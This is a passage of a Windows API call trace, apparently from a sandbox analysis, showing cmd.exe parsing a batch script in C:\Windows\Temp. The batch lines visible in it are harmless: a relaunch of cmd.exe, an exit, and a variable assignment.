lpDistanceToMoveHigh=0x0) returned 0x77a [0174.677] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe8c0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe8c0*=0x1fff, lpOverlapped=0x0) returned 1 [0174.677] SetFilePointer (in: hFile=0x88, lDistanceToMove=1972, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b4 [0174.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="start %SystemRoot%\\SysArm32\\cmd.exe /c \"\"!_cmdf!\" %* r2\"\r\n", cbMultiByte=58, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="start %SystemRoot%\\SysArm32\\cmd.exe /c \"\"!_cmdf!\" %* r2\"\r\nTECTURE%==AMD64 if not defined r2 (\r\n\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 58 [0174.677] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.677] GetFileType (hFile=0x88) returned 0x1 [0174.677] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.677] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b4 [0174.677] GetProcessHeap () returned 0x19a8f1e0000 [0174.677] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.677] GetProcessHeap () returned 0x19a8f1e0000 [0174.677] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.677] GetProcessHeap () returned 0x19a8f1e0000 [0174.677] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb740 [0174.677] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.677] GetProcessHeap () returned 0x19a8f1e0000 [0174.678] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0174.678] GetProcessHeap () returned 0x19a8f1e0000 [0174.678] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.678] GetProcessHeap () returned 0x19a8f1e0000 [0174.679] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.679] GetProcessHeap () returned 0x19a8f1e0000 [0174.679] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0174.679] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0174.679] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0174.679] _wcsicmp (_String1="IF", _String2="start") returned -10 [0174.679] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0174.679] _wcsicmp (_String1="REM", _String2="start") returned -1 [0174.679] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0174.679] GetProcessHeap () returned 0x19a8f1e0000 [0174.679] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0174.679] GetProcessHeap () returned 0x19a8f1e0000 [0174.679] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb740 [0174.679] GetProcessHeap () returned 0x19a8f1e0000 [0174.679] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x70) returned 0x19a8f1ece80 [0174.679] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.680] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b4 [0174.680] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe890, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe890*=0x1fff, lpOverlapped=0x0) returned 1 [0174.680] SetFilePointer (in: hFile=0x88, lDistanceToMove=1981, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7bd [0174.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="exit /b\r\nstemRoot%\\SysArm32\\cmd.exe /c \"\"!_cmdf!\" %* r2\"\r\nTECTURE%==AMD64 if not defined r2 (\r\n\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 9 [0174.680] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.680] GetFileType (hFile=0x88) returned 0x1 [0174.680] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.680] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7bd [0174.680] GetProcessHeap () returned 0x19a8f1e0000 [0174.680] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.680] GetProcessHeap () returned 0x19a8f1e0000 [0174.681] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.681] GetProcessHeap () returned 0x19a8f1e0000 [0174.681] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0174.681] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0174.681] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0174.681] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0174.681] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0174.681] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0174.681] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0174.681] GetProcessHeap () returned 0x19a8f1e0000 [0174.681] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0174.681] GetProcessHeap () returned 0x19a8f1e0000 [0174.681] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0174.681] GetProcessHeap () returned 0x19a8f1e0000 [0174.681] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec880 [0174.681] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.681] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7bd [0174.682] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe860, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe860*=0x1fff, lpOverlapped=0x0) returned 1 [0174.682] SetFilePointer (in: hFile=0x88, lDistanceToMove=1984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c0 [0174.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nt /b\r\nstemRoot%\\SysArm32\\cmd.exe /c \"\"!_cmdf!\" %* r2\"\r\nTECTURE%==AMD64 if not defined r2 (\r\n\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 3 [0174.682] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.682] GetFileType (hFile=0x88) returned 0x1 [0174.682] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.682] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7c0 [0174.682] GetProcessHeap () returned 0x19a8f1e0000 [0174.682] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.682] GetProcessHeap () returned 0x19a8f1e0000 [0174.682] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.683] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.683] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.683] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.683] _tell (_FileHandle=3) returned 1984 [0174.683] _close (_FileHandle=3) returned 0 [0174.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysArm32\\cmd.exe", nBufferLength=0x208, lpBuffer=0x43f9efea40, lpFilePart=0x43f9efe7e0 | out: lpBuffer="C:\\Windows\\SysArm32\\cmd.exe", lpFilePart=0x43f9efe7e0*="cmd.exe") returned 0x1b [0174.683] wcsncmp (_String1="C:\\W", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0174.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\SysArm32\\cmd.exe" (normalized: "c:\\windows\\sysarm32\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7f0) returned 0xffffffffffffffff [0174.683] GetLastError () returned 0x3 [0174.683] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0174.683] GetLastError () returned 0x6 [0174.683] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.684] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.705] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.705] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.705] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.705] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.706] SetConsoleInputExeNameW () returned 0x1 [0174.706] GetConsoleOutputCP () returned 0x1b5 [0174.706] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.706] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.707] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.707] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.707] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.707] SetFilePointer (in: hFile=0x88, lDistanceToMove=1984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c0 [0174.707] GetProcessHeap () returned 0x19a8f1e0000 [0174.707] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec880) returned 1 [0174.707] GetProcessHeap () returned 0x19a8f1e0000 [0174.707] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.707] GetProcessHeap () returned 0x19a8f1e0000 [0174.708] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0174.708] GetProcessHeap () returned 0x19a8f1e0000 [0174.708] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0174.708] GetProcessHeap () returned 0x19a8f1e0000 [0174.709] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece80) returned 1 [0174.709] GetProcessHeap () returned 0x19a8f1e0000 [0174.709] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0174.709] GetProcessHeap () returned 0x19a8f1e0000 [0174.709] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0174.709] GetProcessHeap () returned 0x19a8f1e0000 [0174.709] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0174.709] GetProcessHeap () returned 0x19a8f1e0000 [0174.710] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9450) returned 1 [0174.710] GetProcessHeap () returned 0x19a8f1e0000 [0174.710] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0174.710] GetProcessHeap () returned 0x19a8f1e0000 [0174.710] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0174.710] GetProcessHeap () returned 0x19a8f1e0000 [0174.711] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0174.711] GetProcessHeap () returned 0x19a8f1e0000 [0174.711] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec660) returned 1 [0174.711] GetProcessHeap () returned 0x19a8f1e0000 [0174.711] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecde0) returned 1 [0174.711] GetProcessHeap () returned 0x19a8f1e0000 [0174.711] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0174.711] GetProcessHeap () returned 0x19a8f1e0000 [0174.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0174.712] GetProcessHeap () returned 0x19a8f1e0000 [0174.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca60) returned 1 [0174.712] GetProcessHeap () returned 0x19a8f1e0000 [0174.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0174.712] GetProcessHeap () returned 0x19a8f1e0000 [0174.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0174.712] GetProcessHeap () returned 0x19a8f1e0000 [0174.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc80) returned 1 [0174.712] GetProcessHeap () returned 0x19a8f1e0000 [0174.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0174.712] GetProcessHeap () returned 0x19a8f1e0000 [0174.712] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7d0) returned 1 [0174.713] GetProcessHeap () returned 0x19a8f1e0000 [0174.713] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0174.713] GetProcessHeap () returned 0x19a8f1e0000 [0174.713] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0174.713] GetProcessHeap () returned 0x19a8f1e0000 [0174.713] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0174.713] GetProcessHeap () returned 0x19a8f1e0000 [0174.713] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8c0) returned 1 [0174.713] GetProcessHeap () returned 0x19a8f1e0000 [0174.713] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb60) returned 1 [0174.713] GetProcessHeap () returned 0x19a8f1e0000 [0174.714] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0174.714] GetProcessHeap () returned 0x19a8f1e0000 [0174.714] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0174.714] GetProcessHeap () returned 0x19a8f1e0000 [0174.714] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f93b0) returned 1 [0174.714] GetProcessHeap () returned 0x19a8f1e0000 [0174.714] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0174.714] GetProcessHeap () returned 0x19a8f1e0000 [0174.715] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0174.715] GetProcessHeap () returned 0x19a8f1e0000 [0174.715] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0174.715] GetProcessHeap () returned 0x19a8f1e0000 [0174.715] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.715] GetProcessHeap () returned 0x19a8f1e0000 [0174.715] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0174.715] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.715] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7c0 [0174.716] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.716] SetFilePointer (in: hFile=0x88, lDistanceToMove=1986, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c2 [0174.716] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\nt /b\r\nstemRoot%\\SysArm32\\cmd.exe /c \"\"!_cmdf!\" %* r2\"\r\nTECTURE%==AMD64 if not defined r2 (\r\n\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 2 [0174.716] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.716] GetFileType (hFile=0x88) returned 0x1 [0174.716] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.716] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7c2 [0174.716] GetProcessHeap () returned 0x19a8f1e0000 [0174.716] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.716] GetProcessHeap () returned 0x19a8f1e0000 [0174.717] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.717] _tell (_FileHandle=3) returned 1986 [0174.717] _close (_FileHandle=3) returned 0 [0174.717] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.717] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.717] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.717] SetFilePointer (in: hFile=0x88, lDistanceToMove=1986, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c2 [0174.718] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.718] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7c2 [0174.718] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.718] SetFilePointer (in: hFile=0x88, lDistanceToMove=2126, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x84e [0174.718] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0174.718] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.718] GetFileType (hFile=0x88) returned 0x1 [0174.718] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.718] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x84e [0174.718] GetProcessHeap () returned 0x19a8f1e0000 [0174.718] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.718] GetProcessHeap () returned 0x19a8f1e0000 [0174.719] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.719] _tell (_FileHandle=3) returned 2126 [0174.719] _close (_FileHandle=3) returned 0 [0174.719] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.719] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.719] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.719] SetFilePointer (in: hFile=0x88, lDistanceToMove=2126, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x84e [0174.719] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.719] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x84e [0174.720] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.720] SetFilePointer (in: hFile=0x88, lDistanceToMove=2128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x850 [0174.720] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0174.720] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.720] GetFileType (hFile=0x88) returned 0x1 [0174.720] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.720] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x850 [0174.720] GetProcessHeap () returned 0x19a8f1e0000 [0174.720] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.720] GetProcessHeap () returned 0x19a8f1e0000 [0174.721] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.721] _tell (_FileHandle=3) returned 2128 [0174.721] _close (_FileHandle=3) returned 0 [0174.721] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.721] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.721] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.721] SetFilePointer (in: hFile=0x88, lDistanceToMove=2128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x850 [0174.721] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.721] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x850 [0174.721] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.721] SetFilePointer (in: hFile=0x88, lDistanceToMove=2142, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x85e [0174.722] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"blank=\"\r\n", cbMultiByte=14, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"blank=\"\r\n============================================================================================================================\r\n") returned 14 [0174.722] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.722] GetFileType (hFile=0x88) returned 0x1 [0174.722] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.722] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x85e [0174.722] GetProcessHeap () returned 0x19a8f1e0000 [0174.722] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.722] GetProcessHeap () returned 0x19a8f1e0000 [0174.722] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.722] _wcsicmp (_String1="set", _String2=")") returned 74 [0174.722] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.723] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.723] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.723] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.723] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.723] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.723] GetProcessHeap () returned 0x19a8f1e0000 [0174.723] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0174.723] GetProcessHeap () returned 0x19a8f1e0000 [0174.723] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0174.723] GetProcessHeap () returned 0x19a8f1e0000 [0174.723] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb860 [0174.723] _tell (_FileHandle=3) returned 2142 [0174.723] _close (_FileHandle=3) returned 0 [0174.723] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.723] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.723] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.723] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.723] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.723] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.723] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.724] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.724] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.724] _wcsicmp (_String1="set", _String2="ECHO") returned 